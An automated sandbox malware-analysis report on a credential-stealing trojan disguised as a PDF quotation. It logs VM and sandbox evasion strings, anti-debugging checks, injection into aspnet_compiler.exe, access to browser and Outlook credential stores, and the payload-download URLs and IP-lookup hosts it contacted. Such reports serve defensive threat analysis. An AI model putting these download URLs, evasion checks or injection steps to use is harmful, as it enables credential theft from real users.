              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -594640s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -594531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99890Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99781Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99671Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99562Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99453Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99343Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99234Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99123Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 99014Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 98905Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 98796Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 98605Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 98499Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 98233Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 98125Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 98015Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97906Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97796Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97687Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97578Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97468Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97359Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97250Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97140Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 97031Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96921Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96812Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96703Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96592Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96484Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96375Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96265Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96156Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 96046Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 95937Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 95825Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 95718Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 95479Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 95359Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 95249Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 95140Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 95031Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 94921Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 94811Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 94702Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 94593Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 94484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599855Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599748Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599629Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598952Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598260Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597496Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596510Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595952Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595296Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595186Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594531Jump to behavior
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-CH:VMware|VIRTUAL|A M I|Xen
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-CH:Microsoft|VMWare|Virtual
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: explorer SbieDll.dll!cuckoomon.dll"win32_process.handle='{0}'#ParentProcessId$cmd%select * from Win32_BIOS8Unexpected WMI query failure&version'SerialNumber)VMware|VIRTUAL|A M I|Xen*select * from Win32_ComputerSystem+manufacturer,model-Microsoft|VMWare|Virtual.john/anna0xxxxxxxx
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638031213.000001195CF86000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3318801194.000001F59DEBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF8491619F5 CheckRemoteDebuggerPresent,0_2_00007FF8491619F5
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 9DD20000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1F59DD20000Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeQueries volume information: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3319881103.000001F59FBCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3319881103.000001F59FBCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              Scheduled Task/Job
              211
              Process Injection
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Email Collection
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job
              1
              DLL Side-Loading
              1
              Scheduled Task/Job
              51
              Virtualization/Sandbox Evasion
              LSASS Memory221
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              211
              Process Injection
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS51
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560140 Sample: QUOTATION_NOVQTRA071244#U00... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 18 reallyfreegeoip.org 2->18 20 s24.filetransfer.io 2->20 22 3 other IPs or domains 2->22 30 Found malware configuration 2->30 32 Malicious sample detected (through community Yara rule) 2->32 34 Multi AV Scanner detection for submitted file 2->34 38 5 other signatures 2->38 8 QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe 14 2 2->8         started        signatures3 36 Tries to detect the country of the analysis system (by using the IP) 18->36 process4 dnsIp5 24 filetransfer.io 188.114.96.3, 443, 49704, 49705 CLOUDFLARENETUS European Union 8->24 40 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->40 42 Writes to foreign memory regions 8->42 44 Creates a thread in another existing process (thread injection) 8->44 46 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->46 12 aspnet_compiler.exe 14 3 8->12         started        signatures6 process7 dnsIp8 26 checkip.dyndns.com 193.122.130.0, 49806, 49825, 49835 ORACLE-BMC-31898US United States 12->26 28 reallyfreegeoip.org 188.114.97.3, 443, 49811, 49822 CLOUDFLARENETUS European Union 12->28 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal browser information (history, passwords, etc) 12->50 16 conhost.exe 12->16         started        signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe18%ReversingLabsWin64.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://s24.filetransfer.io/storage/download/72vwG3nYeuAb0%Avira URL Cloudsafe
              http://crl.micros10%Avira URL Cloudsafe
              https://s24.filetransfer.io0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              s24.filetransfer.io
              188.114.96.3
              truefalse
                high
                filetransfer.io
                188.114.96.3
                truefalse
                  high
                  reallyfreegeoip.org
                  188.114.97.3
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.130.0
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://filetransfer.io/data-package/u7ghXEYp/downloadfalse
                          high
                          https://filetransfer.io/data-package/u7ghXEYp/downloadfalse
                            high
                            http://checkip.dyndns.org/false
                              high
                              https://s24.filetransfer.io/storage/download/72vwG3nYeuAbfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://reallyfreegeoip.org/xml/8.46.123.75false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://github.com/mgravell/protobuf-netiQUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/14436606/23354QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                    high
                                    https://github.com/mgravell/protobuf-netJQUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      high
                                      https://reallyfreegeoip.org/xml/8.46.123.75paspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.micros1aspnet_compiler.exe, 00000004.00000002.3322566875.000001F5B82E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
